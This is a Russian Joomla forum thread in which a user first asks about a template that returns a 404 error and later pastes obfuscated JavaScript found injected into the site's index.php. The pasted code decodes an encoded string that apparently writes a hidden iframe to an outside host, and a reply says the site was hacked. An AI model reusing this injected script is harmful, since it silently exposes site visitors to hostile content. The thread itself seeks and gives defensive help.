1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

[J1.5] Не отабражается шаблон

Тема в разделе "Joomla", создана пользователем Darkidze, 19 май 2009.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Статус темы:
Закрыта.
Модераторы: arman29, DMS, Genk0
  1. Darkidze

    Darkidze Постоялец

    Регистр.:
    14 апр 2008
    Сообщения:
    61
    Симпатии:
    3
    Помогите плз, с джумлой мало сталкивался. На денвере все норм, выложил сайт на хостинг все норм работало, подключил отредактированный шаблон выбило ошибку 404:
    Вы не можете посетить текущую страницу потому, что:
    1. просроченная закладка/избранное
    2. поисковый механизм, у которого просрочен список для этого сайта
    3. пропущен адрес
    4. у вас нет прав на эту страницу
    5. Запрашиваемый ресурс не был найден.
    6. В процессе обработки вашего запроса произошла ошибка.
    На локальном все норм, не пойму в чем тут дело :nezn:
     
  2. CB9T

    CB9T Создатель

    Регистр.:
    8 янв 2009
    Сообщения:
    49
    Симпатии:
    7
    htaccess подключал??? может ЧПУ использовал?
     
  3. Darkidze

    Darkidze Постоялец

    Регистр.:
    14 апр 2008
    Сообщения:
    61
    Симпатии:
    3
    ссылку на автора шаблона только убил и картинки поменял
     
  4. campus

    campus

    Регистр.:
    2 авг 2008
    Сообщения:
    154
    Симпатии:
    35
    1) Проверь работает ли твой сайт с другим шаблоном на сервере

    если сайт работает с другим шаблоном, и не работает с шаблоном который ты так сильно полюбил, то =>

    2)Закоменируй поочередно весь код PHP в шаблоне ( то есть каждый фрагмент кода поочередно... после чего выявишь код который тебя пАлит )

    То есть :

    закоментировал фрагмент кода - перегрузи страницу, если без изменений =>

    раскоментируй назад, и перейди к другому фрагменту php-кода....


    и так далее...


    когда выявишь пАлющий тебя фрагмент кода - скинь его сюда, интересно посмотреть...


    В принципе тут может быть целая прогрессия... - это когда, существуют в коде несколько взаимоЗависимых фрагментов кода, которые друг-друга проверяют....

    и переберать тут можно, в таком случае, достаточно долго... поэтому я бы порекомендовал удалить из шаблона весь php-код.... изучить учебник - joomla-команд для написания шаблона ... и вписать код поновому...

    единственное - может там javaScript какой интересный... если яваСкрипт нужен - придется порыться, и поизучать... если яваСкрипт не нужен - то ну и черт с ним...

    Еще может быть такая фигня, что в шаблоне используется аякс для вывода модулей....

    если модули которые идут с шаблоном - отсутствуют... понятно что будут ошибки.... если модули есть - их придется нулить.... либо отказаться от модулей и аякса ....


    резюме:

    Удалите нафиг из шаблона весь код отличный от HTML и CSS...

    Пропишите код-PHP по новому.... прочтите учебник по Joomla-Template
     
    Darkidze нравится это.
  5. TrahMaster

    TrahMaster Писатель

    Регистр.:
    14 май 2008
    Сообщения:
    1
    Симпатии:
    1
    а если оставить все как есть то работает? если да то значит не только это убрал, верни обратно и убирай/меняй одно за другим, так поймешь что делаешь не так
     
    Darkidze нравится это.
  6. Darkidze

    Darkidze Постоялец

    Регистр.:
    14 апр 2008
    Сообщения:
    61
    Симпатии:
    3
    Подскажите плз, сайт работает сутки. На следующий день захожу на сайт, пишет ошибка синтаксическая в файле "index.php", в файле добавляется левый код какой то :
    <script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHICNHDHJHDHEGFGNHDCOGO
    GBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJG
    EHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGF
    CEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDG
    PGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHE
    GIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEB
    ENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=String.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charC
    odeAt(i+1)-65);}document.write(x);</script><script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHA
    DKCPCPHICNHDHJHDHEGFGNHDCOGOGBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHE
    COHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNG
    FGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEH
    EHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDGPGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGP
    HFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCG
    BGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=Str
    ing.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charCodeAt(i+1)-65);}document.write(x);</script>
    Я не пойму откуда он берется и что это такое?? помогите плз
     
  7. werbol

    werbol Постоялец

    Регистр.:
    20 июл 2007
    Сообщения:
    95
    Симпатии:
    40
    Поздравляю ваш сайт взломан, или у соседей на томже сервере завелся шелл. Срочно лечить. Самый простой заново перезалить все файлы joomla.
     
    Darkidze нравится это.
Статус темы:
Закрыта.